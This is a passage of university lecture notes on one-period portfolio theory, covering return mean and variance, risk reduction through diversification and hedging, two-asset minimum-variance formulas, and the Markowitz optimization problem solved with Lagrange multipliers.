Outputs clients: [[GpuDnnConv{algo=‘small’, inplace=True}(GpuContiguous.0, GpuContiguous.0, GpuAllocEmpty.0, GpuDnnConvDesc{border_mode=‘valid’, subsample=(1, 1), conv_mode=‘conv’, precision=‘float32’}.0, Constant{1.0}, Constant{0.0})]]
HINT: Re-running with most Theano optimization disabled could give you a back-trace of when this node was created. This can be done with by setting the Theano flag ‘optimizer=fast_compile’. If that does not work, Theano optimizations can be disabled with ‘optimizer=None’.
HINT: Use the Theano flag ‘exception_verbosity=high’ for a debugprint and storage map footprint of this apply node.
I’m not sure where or why the error is produced… I’m running the course on my local machine, with 16 GB RAM and a GTX 970 running on Ubuntu.
Can someone help me? Thanks in advance.
Hi justinho,
That was bugging me as well. It turns out that updating the weights for bn_layers on line 80 updates the weights in the final model on line 79. I checked before and after just to be sure!
I could not find a compare weights function in Keras, so I use the code below to compare weights between 2 equally structured sequential models:
def compare_weights(model_1, model_2): for i in range(len(model_1.layers)): same = True for j in range(len(model_1.layers[i].get_weights())): if not (np.array_equal(model_1.layers[i].get_weights()[j], model_2.layers[i].get_weights()[j])): same = False print(same)
I had a question about the running notebooks. It has been my understanding that the * appears next to code while it is executing. However, during fitting sections of code it appears to have already executed (fc_model = get_fc_model) and still has the *. I believe the code is done executing because the fitting output from the code below (fc_model.fit) is showing. Usually after the fitting is complete the * corrects is replaced by a number.
Does anyone know why this is happening?
For example see this screenshot below.
My concern is more about debuggging. I have noticed the notebook hang when I execute several sections at the same time and Im not sure which section of the notebook needs attention.
I understand that overfitting first allows us to know the model is complex enough to handle the data.
My question is how to determine when we are overfitting. Just noting that val_acc is worse than training acc would seem to be not enough, in the case where Dropouts (applied to training but not validation) may artificially hamper training accuracy.
Should I train until val_acc begins to decrease instead, and not worry so much about comparing it directly to the training accuracy?
If validation is worse than training, then you’re overfitting - since dropout makes training worse, not better! However, you don’t want to have no overfitting - there’s some best amount. So you should focus on getting the best validation score you can, rather than the least overfitting.
In the notes about Zero-Padding, the first sentence reads:
… given that the filter necessarily operates on the premise that there are 8 surrounding pixels.
Why is the filter operating on the premise that there are 8 surrounding pixels? I thought it should be 9 surrounding pixels since the filter is a 3 x 3 matrix.
I’m confused about the role of vgg_ft(out_dim). My understanding is this updated model cuts off the last layer(s) and replaces it with a softmax layer with a specified number of outputs (2 in our case, dogs and cats). But Keras did this automatically for us using the Vgg16() model and our original 7 lines of code, right? Why do we have to hardcode this change now?
In the original 7 lines of code, this was achieved by the following line:
vgg.finetune(batches)
finetune calls vgg_ft(batches.nb_class), which basically achieves the same thing.
@atk0 - Thanks for your reply. It looks to me as though vgg.finetune(batches) calls up vgg.ft(num), and vgg_ft(out_dim) is an unrelated alternative function that exists in utils.py. Do I have this right? And if so, why was vgg_ft(out_dim) built in the first place?
Hi again, Jake
They’re not unrelated - the “global” vgg_ft(out_dim) function is simply a convenience function that creates a vgg16 model, performs finetuning on that model and then returns the model. Because part1 uses vgg16 frequently, Jeremy obviously decided that it would be nice to have a convenience function that does everything under the hood.
In the Lesson3,ipynb, I saw the In[6] is like this:
# Copy the weights from the pre-trained model. # NB: Since we're removing dropout, we want to half the weights def proc_wgts(layer): return [o/2 for o in layer.get_weights()]
This mean using the 1/2 of each value of weights, right? But dropout is related to reduce the number of weights, so I am confused why we divide each weight by 2 here. Can anyone help me understand it?
In addition, if the Dropout is not 0.5, but say, 0.8, do we still divide by 2?
How do I check the ‘summary’ of
conv_layers and
fc_layers after
conv_layers = layers[:last_conv_idx+1] fc_layers = layers[last_conv_idx+1:]
They are lists, but I can only get something like this if I display the
fc_layers:
[<keras.layers.pooling.MaxPooling2D at 0x7ff151153610>, <keras.layers.core.Flatten at 0x7ff1510b64d0>, <keras.layers.core.Dense at 0x7ff1511255d0>, <keras.layers.core.Dropout at 0x7ff15111f850>, <keras.layers.core.Dense at 0x7ff1510bf250>, <keras.layers.core.Dropout at 0x7ff1510d9250>, <keras.layers.core.Dense at 0x7ff1510ae290>]
How can I check the shape of each of these layers?? Thanks!
I have this question because when I do:
def get_fc_model(): model = Sequential([ MaxPooling2D(input_shape=conv_layers[-1].output_shape[1:]), Flatten(), Dense(4096, activation='relu'), Dropout(0.), Dense(4096, activation='relu'), Dropout(0.), Dense(3, activation='softmax') ]) for l1, l2 in zip(model.layers, fc_layers): l1.set_weights(proc_wgts(l2)) model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy']) return model fc_mdl = get_fc_model()
I got errors like:
ValueError Traceback (most recent call last)
in ()
----> 1 fc_mdl = get_fc_model()
in get_fc_model()
10 ])
11
—> 12 for l1, l2 in zip(model.layers, fc_layers): l1.set_weights(proc_wgts(l2))
13
14 model.compile(optimizer=opt,
/home/shi/anaconda2/lib/python2.7/site-packages/keras/engine/topology.pyc in set_weights(self, weights)
983 str(pv.shape) +
984 ’ not compatible with '
–> 985 'provided weight shape ’ + str(w.shape))
986 weight_value_tuples.append((p, w))
987 K.batch_set_value(weight_value_tuples)
ValueError: Layer weight shape (4096, 3) not compatible with provided weight shape (4096, 1000)
So I think the shape is wrong somewhere. Please help!
Hi, I have a question about training low level filters (that is, the first or second conv level). When we train the last level, we easily come up with loss function using log loss or simple sse. It’s based on the correct label and our predicted probability.
But for the first few levels, they are meant to capture abstract structures like edges and curves. Not only there’s no way to tell if the current activation map is correct (look at it manually??), but also it’s hard to get numerical loss (how wrong/right we are).
So, how do we train the set of weights (in this case, the values in the filter matrix) for the low level filters in practice?
Read some of the articles on back propagation. That’s how earlier layers get trained.
Hi,
First off apologies if this has been asked before. A search of the forums for State Farm didn’t turn up any related results. I am encountering issues with the State Farm data set. I am able to download the data set using the Kaggle cli tool after accepting the competitions terms. Checking the file sizes of the downloaded zip files confirms that I have correctly downloaded the data i.e. the imgs.zip file is 4.0GB on disk. I am unable to unzip the files. It appears that the zip files are corrupted in some way, or that they are not actually zip files.
unzip imgs.zip
results in the following output
Archive: imgs imgs.zip or imgs.zip.zip, and cannot find imgs.zip.ZIP, period.
I also tried using the
jar tool which was suggested on stackoverflow.
jar xf imgs.zip
Results in
Ick! 0
Myself and some others started the fast.ai course together recently. Others have encountered the same issue so it is definitely not isolated to my case. Has any one else encountered this issue and know of a solution or an alternate place to obtain the competition data set? Does this suggest that the competition has closed or something? I’m new to Kaggle.
Thanks,
Chris | http://forums.fast.ai/t/lesson-3-discussion/186?page=7 | CC-MAIN-2018-17 | refinedweb | 2,085 | 51.14 |
Problem:
You have C code like
printf("test");
but when you try to compile it you see a warning like
main.c: In function ‘main’: main.c:2:5: warning: implicit declaration of function ‘printf’ [-Wimplicit-function-declaration] printf("test"); ^~~~~~ main.c:2:5: warning: incompatible implicit declaration of built-in function ‘printf’ main.c:2:5: note: include ‘<stdio.h>’ or provide a declaration of ‘printf’
Solution:
Add
#include <stdio.h>
at the top of the source file where the warning occured.
Note that this warning message is just a warning and if you use printf correctly, your program will work even without
#include <stdio.h>. However, incorrect usage of
printf and similar functions will lead to hard-to-debug errors, so I recommend to add
#include <stdio.h> in any case, even if it works without. | https://techoverflow.net/2019/06/20/how-to-fix-gcc-error-implicit-declaration-of-function-printf/ | CC-MAIN-2019-30 | refinedweb | 138 | 59.6 |
HI,
In class1 video path of URLs.PETS is comming as ‘’
Where in code this path was put in URLs.PETs
Thanks
HI,
In class1 video path of URLs.PETS is comming as ‘’
Where in code this path was put in URLs.PETs
Thanks
I think this is a function built into the FastAI library. When you call this function, the FastAI API downloads a copy of the data you specify, in this case PETS, from an S3 bucket on AmazonS3. So I don’t think you have to explicitly write out the AWS location of the data, the fastAI library downloads the data from where it is stored for you when you tell it which dataset to download,
URLs is a global constant built in to FastAI. You can check out the documentation for URLs and the source code.
So I guess we imported those global constants when we ran:
from fastai.vision import *
As a side note, there are a few ways to find out more information about something in the code:
doc(URLs)
help(URLs)
I just completed lesson 1 and am trying to do this exercise with another dataset. Before getting my own from google images, I was thinking of using something readily available (like the Iris set for UCI.)
I am unsure of how to substitute the PETs example with this new data set. Can anyone help me out?
I am in the same boat. I have been through the first video a few times and I have been through the first notebook more than that. The first time just running the modules and than trying some different things. Mostly the number if iterations and watching with a few more the results improve, and with a lot more watching them overshoot, and start to move back to the best up until then. The terms used are not super well explained, and being out for the first time this is all new. After a few trips through, I tried uploading a different dataset and things got interesting. I have been unable to get untar to swallow anything I have tried. Oddly enough when I try sticking URLs.PETS into my browser it barfs, but if I add a tar extension it will try and download a .tgz file. IMHO this function and way of grabbing data seems to make it very hard for us to play with this notebook.
The other thing is that you get to the end of the notebook, and you see your numbers improve, but you have no real way to actually play with it. How about a piece at the end for you to upload your own image(s) and see how it does at classifying it/them. To me that is the part that I really want to see work.
I am thankful for this, you guys put a ton of work into it, but I think you are working at such a high level you may have forgot what it is like just getting started. | https://forums.fast.ai/t/class1-video-path-of-urls-pets/58487 | CC-MAIN-2019-51 | refinedweb | 506 | 78.28 |
For a list of functions, their usage, and more, check out
What is PowerZure?
PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.
CLI vs. Portal
A common question is why use PowerZure or command line at all when you can just login to the Azure web portal?
This is a fair question and to be honest, you can accomplish 90% of the functionality in PowerZure through clicking around in the portal, however by using the Azure PowerShell modules, you can perform tasks programmatically that are tedious in the portal. E.g, listing the groups a user belongs to. In addition, the ability to programmatically upload exploits instead of tinkering around with the messy web UI. Finally, if you compromise a user who has used the PowerShell module for Azure before and are able to steal the accesstoken.json file, you can impersonate that user which effectively bypasses multi-factor authentication.
Why PowerShell?
While the offensive security industry has seen a decline in PowerShell usage due to the advancements of defensive products and solutions, this project does not contain any malicious code. PowerZure does not exploit bugs within Azure, it exploits misconfigurations.
C# was also explored for creating this project but there were two main problems:
There were at least four different APIs being used for the project. MSOL, Azure REST, Azure SDK, Graph.
The documentation for these APIs simply was too poor to continue. Entire methods missing, namespaces typo’d, and other problems begged the question of what advantage did C# give over PowerShell (Answer: none)
Realistically, there is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure CLI.
Requirements
The "Az" Azure PowerShell module is the primary module used in PowerZure, as it handles most requests interacting with Azure resources. The Az module interacts using the Azure REST API.
The AzureAD PowerShell Module is also used and is for handling AzureAD requests. The AzureAD module uses the Microsoft Graph API.
Author
Author: Ryan Hausknecht (@haus3c) | https://amp.kitploit.com/2020/11/powerzure-powershell-framework-to.html | CC-MAIN-2022-27 | refinedweb | 381 | 54.22 |
1 Portfolio mean and variance
Copyright © 2005 by Karl Sigman

Here we study the performance of a one-period investment X₀ > 0 (dollars) shared among several different assets. Our criterion for measuring performance will be the mean and variance of its rate of return, the variance being viewed as measuring the risk involved. Among other things we will see that the variance of an investment can be reduced simply by diversifying, that is, by sharing X₀ among more than one asset, and this is so even if the assets are uncorrelated. At one extreme, we shall find that it is even possible, under strong enough correlation between assets, to reduce the variance to 0, thus obtaining a risk-free investment from risky assets. We will also study the Markowitz optimization problem and its solution, a problem of minimizing the variance of a portfolio for a given fixed desired expected rate of return.

1.1 Basic model

You plan to invest a (deterministic) total of X₀ > 0 at time t = 0 in a portfolio of n ≥ 2 distinct assets, and the payoff X comes one period of time later (at time t = 1 for simplicity). A priori you do not know how to distribute the amount X₀ among the n assets, your objective being to distribute X₀ in such a way as to give you the best performance. If X₀ᵢ is the amount to be invested in asset i, i ∈ {1, 2, ..., n}, then

X₀ = X₀₁ + X₀₂ + ··· + X₀ₙ.

The portfolio chosen is described by the vector (X₀₁, X₀₂, ..., X₀ₙ) and its payoff is given by X = X₁ + X₂ + ··· + Xₙ, where Xᵢ is the (random) payoff from investing X₀ᵢ in asset i, that is, the cash flow you receive at time t = 1. Rᵢ, called the total return, is the payoff per dollar invested in asset i,

Rᵢ = Xᵢ / X₀ᵢ.

We define the rate of return rᵢ as the corresponding rate, and it holds then that

rᵢ ≝ Rᵢ − 1 = (Xᵢ − X₀ᵢ) / X₀ᵢ;  Xᵢ = (1 + rᵢ)X₀ᵢ.

But note that unlike fixed-income securities, here the rate rᵢ is a random variable, since Xᵢ is assumed so.

The expected rate of return (also called the mean or average rate of return) is given by r̄ᵢ = E(rᵢ), and since X₀ᵢ is assumed deterministic (non-random), it also holds that E(Xᵢ) = (1 + r̄ᵢ)X₀ᵢ. Shorting is allowed, so some of the X₀ᵢ can be negative (as well as positive or zero), as long as X₀₁ + X₀₂ + ··· + X₀ₙ = X₀ > 0. It is convenient to define weights (also called proportions),¹

αᵢ = X₀ᵢ / X₀ = proportion of resources invested in asset i,

¹The point here is that the assets are bought/sold in shares and any proportion thereof. So if one dollar buys 0.4 shares of an asset, and yields payoff 6 dollars, then 10 dollars buys 4 shares and yields payoff 60 dollars.
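These definitions are easy to check numerically. The sketch below uses made-up positions and payoffs (the dollar amounts are illustrative, not taken from the notes) to compute total returns, rates of return, and portfolio weights:

```python
import numpy as np

# Hypothetical positions and payoffs for n = 3 assets (illustrative numbers).
X0 = np.array([50.0, 30.0, 20.0])   # amounts invested, X_0i (summing to X_0 = 100)
X  = np.array([55.0, 33.0, 18.0])   # realized payoffs at t = 1, X_i

R = X / X0             # total returns:  R_i = X_i / X_0i
r = R - 1.0            # rates of return: r_i = R_i - 1 = (X_i - X_0i) / X_0i

# sanity check of the identity X_i = (1 + r_i) X_0i
assert np.allclose((1.0 + r) * X0, X)

alpha = X0 / X0.sum()  # weights alpha_i = X_0i / X_0, which sum to 1
```

With a short position, the corresponding entry of `X0` (and hence of `alpha`) simply goes negative, while the weights still sum to 1.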
and it follows that

α₁ + α₂ + ··· + αₙ = 1,

and the portfolio can equivalently be described by (α₁, α₂, ..., αₙ), with rate of return and expected rate of return given by

r = Σᵢ αᵢrᵢ,  (1)

r̄ = E(r) = Σᵢ αᵢr̄ᵢ.  (2)

Letting σᵢ² = Var(rᵢ) = E(rᵢ²) − r̄ᵢ² and σᵢⱼ = Cov(rᵢ, rⱼ) = E(rᵢrⱼ) − r̄ᵢr̄ⱼ, the variance of the rate of return of the portfolio is given by

σ² = Var(r) = Σᵢ αᵢ²σᵢ² + 2 Σ αᵢαⱼσᵢⱼ  (second sum over 1 ≤ i < j ≤ n).  (3)

σ² is a measure of the risk involved for this portfolio; it is a measure of how far from the mean r̄ our true rate of return r could be. After all, r̄ is an average, and the rate of return r is a random variable that may (with positive probability) take on values considerably smaller than r̄.

Note that the value of X₀ is not needed in determining performance, only the proportions (α₁, α₂, ..., αₙ) are needed: whether you invest a total of one dollar or a million dollars, the values of r, r̄ and σ² are the same when the proportions are the same. In effect, any portfolio can simply be described by a vector (α₁, α₂, ..., αₙ), where Σᵢ αᵢ = 1.

Clearly we could obtain σ² = min{σ₁², σ₂², ..., σₙ²} by investing all of X₀ in the asset with the smallest variance; thus it is of interest to explore how, by investing in more than one asset, we can reduce the variance even further. We do so in the next sections.

1.2 Reducing risk by diversification

One of the main advantages of investing in more than one asset is the possible reduction of risk. Intuitively, by sharing your resources among several different assets, even if one of them has a disastrous (very low) payoff due to its variability, chances are the others will not. To illustrate this phenomenon, let us consider n uncorrelated assets (e.g., Cov(rᵢ, rⱼ) = 0 for i ≠ j), each having the same expected value and variance for rate of return: r̄ᵢ = 0.20, σᵢ² = 1. If you invest all your resources in just one of them, then the performance of your investment is (r̄, σ²) = (0.20, 1).

Now suppose instead that you invest in all n assets in equal proportions, αᵢ = 1/n. Then from (1) and (3) and the fact that σᵢⱼ = 0, i ≠ j, by the uncorrelated assumption, we conclude that the mean rate of return remains at

r̄ = Σᵢ (1/n)(0.20) = 0.20,

but the variance for the portfolio drops to

σ² = Σᵢ (1/n)² = n/n² = 1/n.

Thus the risk tends to 0 as the number of assets n increases, while the rate of return remains the same. In essence, as n increases, our portfolio becomes risk-free.

Our example is important since it involves uncorrelated assets. But in fact, by using correlated assets it is possible (theoretically) to reduce the variance to zero, thus obtaining a risk-free investment from risky assets! To see this, consider two assets (i = 1, 2). Suppose that the total return R₁ for asset 1 is governed by some random event A ("weather is great", for example) with P(A) = 0.5: if A occurs, then R₁ = 2.5; if A does not occur, then R₁ = 0. Suppose that the total return for asset 2 is also governed by A, but in the opposite way: if A occurs, then R₂ = 0; if A does not occur, then R₂ = 2.5. In essence, asset 2 serves as insurance against the event "A does not occur". Letting I{A} denote the indicator function for the event A (= 1 if A occurs; 0 if not), we see that R₁ = 2.5I{A} and R₂ = 2.5(1 − I{A}). The rates of return can thus be expressed as

r₁ = 2.5I{A} − 1,  r₂ = 2.5(1 − I{A}) − 1,

and it is easily seen that σ₁² = σ₂² = (1.25)². Choosing equal weights, α₁ = α₂ = 0.5, the rate of return becomes deterministic:

r = 0.5r₁ + 0.5r₂ = 0.5(2.5I{A} − 1 + 2.5(1 − I{A}) − 1) = 0.5(2.5 − 2) = 0.5(0.5) = 0.25, w.p. 1.

Thus σ² = Var(r) = 0 for this portfolio, and we see that this investment is equivalent to placing your funds in a risk-free account at interest rate r = 0.25. The key here is the negative correlation between r₁ and r₂:

σ₁₂ = Cov(r₁, r₂) = (2.5)² Cov(I{A}, 1 − I{A}) = −(2.5)² Cov(I{A}, I{A}) = −(2.5)² Var(I{A}) = −(2.5)² P(A)(1 − P(A)) = −(1.25)²,

yielding a correlation coefficient ρ = σ₁₂/(σ₁σ₂) = −1: perfect negative correlation. This method of making the investment risk-free is an example of perfect hedging; asset 2 was used to perfectly hedge against the risk in asset 1.

The above examples were meant for illustration only; assets are typically correlated in more complicated ways, as we know by watching stock prices fall all together at times.

It thus is important to solve, for any given set of n assets (with given rates of return, variances and covariances), for the weights corresponding to the minimum-variance portfolio. We start on this problem next.

1.3 Minimal variance when n = 2

When n = 2 the weights can be described by one number α, where α₁ = α and α₂ = 1 − α. Because shorting is allowed, one of these weights might be negative. For example, α₁ = −1, α₂ = 2 is possible if X₀₁ = −1 and X₀₂ = 2 (so that X₀ = 1): short one dollar of asset 1 and buy two dollars of asset 2. The performance of our portfolio can then be described by

r = αr₁ + (1 − α)r₂,  (4)

r̄ = E(r) = αr̄₁ + (1 − α)r̄₂,  (5)

f(α) = Var(r) = α²σ₁² + (1 − α)²σ₂² + 2α(1 − α)σ₁₂,  (6)
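The calculations in Sections 1.2 and 1.3 are easy to verify numerically: equation (3) is just the quadratic form αᵀΣα of the weight vector against the covariance matrix, and (6) is its n = 2 special case. A minimal sketch (NumPy assumed available; the choice n = 50 is arbitrary):

```python
import numpy as np

def portfolio_stats(alpha, rbar, cov):
    """Mean and variance of the portfolio rate of return, per (1)-(3)."""
    alpha, rbar, cov = map(np.asarray, (alpha, rbar, cov))
    return alpha @ rbar, alpha @ cov @ alpha

# Section 1.2: n uncorrelated assets, each with mean 0.20 and variance 1.
n = 50
mean, var = portfolio_stats(np.full(n, 1.0 / n), np.full(n, 0.20), np.eye(n))
assert abs(mean - 0.20) < 1e-12 and abs(var - 1.0 / n) < 1e-12  # var = 1/n

# Perfect-hedge example: sigma_1^2 = sigma_2^2 = (1.25)^2 and rho = -1,
# so sigma_12 = -(1.25)^2; both assets have mean rate of return 0.25.
v = 1.25 ** 2
cov2 = np.array([[v, -v],
                 [-v, v]])
mean2, var2 = portfolio_stats([0.5, 0.5], [0.25, 0.25], cov2)
assert var2 == 0.0  # equal weights remove all the risk
```

Increasing `n` shrinks `var` toward zero while `mean` stays at 0.20, which is exactly the 1/n effect derived above.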
4 denoting the (random) rate of return, expected rate of return, and variance of return respectively, when using weights α and α. Defining the correlation coefficient ρ between r and r 2 via we can rewrite ρ = σ 2 σ σ 2, σ 2 = ρσ σ 2, and ρ. The variance of the portfolio can thus be re-written as f(α) = α 2 σ 2 + ( α) 2 σ α( α)ρσ σ 2. (7) Our objective now is to find the value of α (denote this by α ) yielding the minimum variance. This would tell us what proportions of the two assets to use (for any amount X 0 > 0 invested) to ensure the smallest risk. The portfolio (α, α ) is called the minimum-variance portfolio. Our method is to solve f (α) = 0. Details are left to the reader who will carry out most of the analysis in a Homework Set 3. We assume here that both assets are risky, by which we mean that σ 2 > 0 and σ2 2 > 0. Theorem. If both assets are risky (and the case σ 2 = σ2 2 with ρ = is not included)2 then f (α) = 0 has a unique solution α and since f (α) > 0 for all α, f(α) is a strictly convex function and hence the solution α is the unique global minimum. This minimum and the corresponding mimimum value f(α ) are given by the formulas α = σ 2 = f(α ) = σ 2 2 ρσ σ 2 σ 2 + σ2 2 2ρσ σ 2, (8) σ 2 σ2 2 ( ρ2 ) σ 2 + σ2 2 2ρσ σ 2. (9) It follows that shorting is required for asset if and only if ρ > σ 2 /σ, whereas shorting is required for asset 2 if and only if ρ > σ /σ 2. (Both of these cases require positive correlation.) Corollary. If both assets are risky, then the variance for the minimal-variance portfolio is strictly smaller than either of the individual asset variances, σ 2 < min{σ 2, σ2 2 }, unless ρ = min{σ, σ 2 } max{σ, σ 2 }, in which case σ 2 = min{σ 2, σ2 2 }. (This includes the case σ2 = σ2 2 and ρ =.) In particular, σ 2 < min{σ 2, σ2 2 } whenever ρ < 0. Corollary.2 If both assets are risky, then. if ρ = 0 (uncorrelated case), then α = σ 2 = f(α ) = σ 2 2 σ 2 +, (0) σ2 2 σ 2 σ2 2 σ 2 +. 
² If σ1^2 = σ2^2 and ρ = 1, then f(α) = σ1^2 = σ2^2 for all α, and thus all portfolios have the same variance; there is no unique minimum-variance portfolio.
2. if ρ = −1 (perfect negative correlation), then the minimum-variance portfolio is risk-free, σ*^2 = f(α*) = 0, with deterministic rate of return given by (w.p. 1)

r = r̄ = (σ2 / (σ1 + σ2)) r1 + (σ1 / (σ1 + σ2)) r2.

In this case no shorting is required: both α* > 0 and 1 − α* > 0.

3. if ρ = 1 (perfect positive correlation) (and σ1^2 ≠ σ2^2), then the minimum-variance portfolio is risk-free, σ*^2 = f(α*) = 0, with deterministic rate of return given by (w.p. 1)

r = r̄ = −(σ2 / (σ1 − σ2)) r1 + (σ1 / (σ1 − σ2)) r2.

In this case shorting is required: α* < 0 if σ1 > σ2; 1 − α* < 0 if σ1 < σ2.

1.4 Investing in two portfolios: treating a portfolio as an asset itself

Suppose you can invest in two different portfolios, where each portfolio has its own rate of return (that you have no control over). The idea here is that each portfolio is itself an asset with its own shares that you can buy/sell and short. We have in mind here, for example, large mutual fund portfolios such as the ones offered by TIAA-CREF or Vanguard. Your objective is to choose the weights invested in each so as to minimize the variance of the rate of return. By treating each portfolio as an asset, our problem falls exactly into the n = 2 framework of the previous section; we can apply Theorem 1.1. As a specific example, let us consider the case when the first asset is a pure stock portfolio and the second a less risky portfolio containing some bonds. The stock portfolio will have a higher variance and a higher rate of return than the bond portfolio, and the two will be somewhat positively correlated. If you are very risk averse, then you might consider investing all in the bond portfolio; but you can do a bit better by diversifying among the two portfolios. Data could be found to estimate r̄1, r̄2, σ1^2, σ2^2, ρ.
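A small sketch of formulas (8) and (9) applied to a hypothetical stock/bond pair. The standard deviations and correlation below are assumptions for illustration only, not values taken from these notes:

```python
def min_var_weight(s1, s2, rho):
    # formula (8): alpha* = (s2^2 - rho*s1*s2) / (s1^2 + s2^2 - 2*rho*s1*s2)
    return (s2**2 - rho * s1 * s2) / (s1**2 + s2**2 - 2 * rho * s1 * s2)

def min_var(s1, s2, rho):
    # formula (9): f(alpha*) = s1^2 * s2^2 * (1 - rho^2) / (s1^2 + s2^2 - 2*rho*s1*s2)
    return (s1**2 * s2**2 * (1 - rho**2)) / (s1**2 + s2**2 - 2 * rho * s1 * s2)

# Assumed stock (riskier) and bond-like (less risky) portfolios:
s1, s2, rho = 0.15, 0.05, 0.25
a_star = min_var_weight(s1, s2, rho)
print(a_star, min_var(s1, s2, rho))
```

Since ρ = 0.25 < σ2/σ1 here, no shorting is needed, and Corollary 1.1 predicts the minimum variance comes out strictly below the bond variance; setting rho = -1 makes the minimum variance exactly zero, matching the risk-free case above.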
Let us assume, for example, that

r̄1 = 0.25, r̄2 = 0.05, σ1 = 0.5, σ2 = 0.05, ρ = 0.25.

Plugging into formulas (8) and (9), we obtain α* ≈ −0.0156, 1 − α* ≈ 1.0156, σ* ≈ 0.0494, and r̄ ≈ 0.0469. So the variance went down very slightly and (of course) at the expense of bringing the average rate of return down to about that of the bond portfolio. Thus far in our study of portfolios, we have ignored our preference for a high average rate of return over a low one; we address this next.

1.5 The Markowitz Problem

Clearly, just as a rational investor wishes for a low variance on return, a high expected rate of return is also desired. For example, you can always keep variance down by investing in bonds over stocks, but you do so at the expense of a decent rate of return. Thus an investor's optimal
portfolio could be best described by its performance pair (r̄, σ), where r̄ is a desired (and feasible) average rate of return, and σ^2 the minimal variance possible for this given r̄. (Put differently, an investor might wish to find the highest rate of return possible for a given acceptable level of risk.) Thus it is of interest to compute the weights corresponding to such an optimal portfolio. This problem and its solution is originally due to Harry Markowitz in the 1950's.³

Using the notation from Section 1.1 for portfolios of n risky assets (and allowing for shorting), we want to find the solution to:

minimize   Σ_i αi^2 σi^2 + 2 Σ_{i<j≤n} αi αj σij
subject to Σ_i αi r̄i = r̄,
           Σ_i αi = 1.

Here, r̄ is a fixed pre-desired level for the expected rate of return, and a solution is any portfolio (α1, α2, ..., αn) that minimizes the objective function (variance) and offers expected rate r̄. This is an example of what is called a quadratic program: an optimization problem with a quadratic objective function and linear constraints. Fortunately, our particular quadratic program can be reduced to a problem of merely solving linear equations, as we will see next. Since the objective function is non-negative, it can be multiplied by any non-negative constant without changing the solution. Moreover, we can simplify notation by using the fact that σii = σi^2. The following equivalent formulation is the most common in the literature:

minimize   (1/2) Σ_i Σ_j αi αj σij   (12)
subject to Σ_i αi r̄i = r̄,   (13)
           Σ_i αi = 1.   (14)

The solution is obtained by using the standard technique from calculus of introducing two more variables called Lagrange multipliers, λ and μ (one for each "subject to" constraint), and forming the Lagrangian

L = (1/2) Σ_i Σ_j αi αj σij − λ(Σ_i αi r̄i − r̄) − μ(Σ_i αi − 1).   (15)

Setting ∂L/∂αi = 0 for each of the n weight variables αi yields n equations:

Σ_{j=1}^{n} αj σij − λ r̄i − μ = 0,   i ∈ {1, 2, ..., n}.

³ Markowitz is one of three economists who won the Nobel Prize in Economics in 1990. The others are Merton Miller and William Sharpe.
Each such equation is linear in the n + 2 variables (α1, α2, ..., αn, λ, μ), and together with the remaining two "subject to" linear constraints yields a set of n + 2 linear equations in n + 2 unknowns. Thus a solution to the Markowitz problem is found by finding a solution (α1, α2, ..., αn, λ, μ) to the set of n + 2 linear equations

Σ_{j=1}^{n} αj σij − λ r̄i − μ = 0,   i ∈ {1, 2, ..., n},   (16)
Σ_i αi r̄i = r̄,
Σ_i αi = 1,

and using the weights (α1, α2, ..., αn) as the solution. In the end, the problem falls into the standard framework of linear algebra, and amounts to computing the inverse of a matrix: solve Ax = b; solution x = A⁻¹b. The student will have had much practice with such methods in Linear Programming (LP) from Operations Research. There are various software packages for dealing with such computations.

We point out in passing that the Markowitz problem will of course only have a solution for values of r̄ that are feasible, that is, that can be achieved via Σ_i αi r̄i = r̄ from some portfolio (α1, α2, ..., αn). Overall, we are considering the set of all feasible pairs (r̄, σ): those pairs for which there exists a portfolio (α1, α2, ..., αn) such that

Σ_i αi r̄i = r̄   and   Σ_i Σ_j αi αj σij = σ^2.

The set of all feasible pairs is a subset of the two-dimensional σ–r̄ plane, and is called the feasible set. For each fixed feasible r̄, the Markowitz problem yields the feasible pair (r̄, σ) with the smallest σ. As we vary r̄ to obtain all such pairs, we obtain what is called the minimum-variance set, a subset of the feasible set. In general σ will increase as you increase your desired level of expected return r̄.

1.6 Finding the minimum-variance portfolio

If we look at the set of all pairs (r̄, σ) in the minimum-variance set, we can find the one with the smallest σ, that is, the one corresponding to the so-called minimum-variance portfolio that we considered in earlier sections. This pair, denoted by (r̄*, σ*), is called the minimum-variance point.
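The n + 2 linear equations described above can be set up and solved directly. A sketch, assuming NumPy is available; the covariance matrix, mean returns, and target rate below are made-up illustrative values:

```python
import numpy as np

# Hypothetical data for n = 3 assets (illustrative only).
Sigma = np.array([[0.04, 0.01, 0.00],
                  [0.01, 0.09, 0.02],
                  [0.00, 0.02, 0.16]])   # covariance matrix (sigma_ij)
rbar = np.array([0.06, 0.10, 0.14])      # expected rates of return
r_target = 0.10                          # desired expected rate of return

n = len(rbar)
# Build the (n + 2) x (n + 2) system:
#   sum_j alpha_j sigma_ij - lambda*rbar_i - mu = 0   (n rows)
#   sum_i alpha_i rbar_i = r_target                   (1 row)
#   sum_i alpha_i = 1                                 (1 row)
A = np.zeros((n + 2, n + 2))
A[:n, :n] = Sigma
A[:n, n] = -rbar
A[:n, n + 1] = -1.0
A[n, :n] = rbar
A[n + 1, :n] = 1.0
b = np.zeros(n + 2)
b[n] = r_target
b[n + 1] = 1.0

x = np.linalg.solve(A, b)
alpha, lam, mu = x[:n], x[n], x[n + 1]
print(alpha, lam, mu)
```

The first n components of the solution are the portfolio weights; the last two are the Lagrange multipliers, and by construction the weights sum to 1 and deliver the target expected rate of return.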
We can modify the Markowitz problem to find the minimum-variance portfolio as follows. If we leave out the requirement that the expected rate of return be equal to a given level r̄, then the Markowitz problem becomes

minimize   (1/2) Σ_i Σ_j αi αj σij   (17)
subject to Σ_i αi = 1,   (18)

and its solution yields the minimum-variance portfolio for n risky assets. Lagrangian methods once again can be employed, where now we need only introduce one new variable μ:

L = (1/2) Σ_i Σ_j αi αj σij − μ(Σ_i αi − 1),   (19)

and the solution reduces to solving n + 1 equations in n + 1 unknowns:

Σ_{j=1}^{n} αj σij − μ = 0,   i ∈ {1, 2, ..., n},   (20)
Σ_i αi = 1.   (21)

1.7 Efficient Frontier

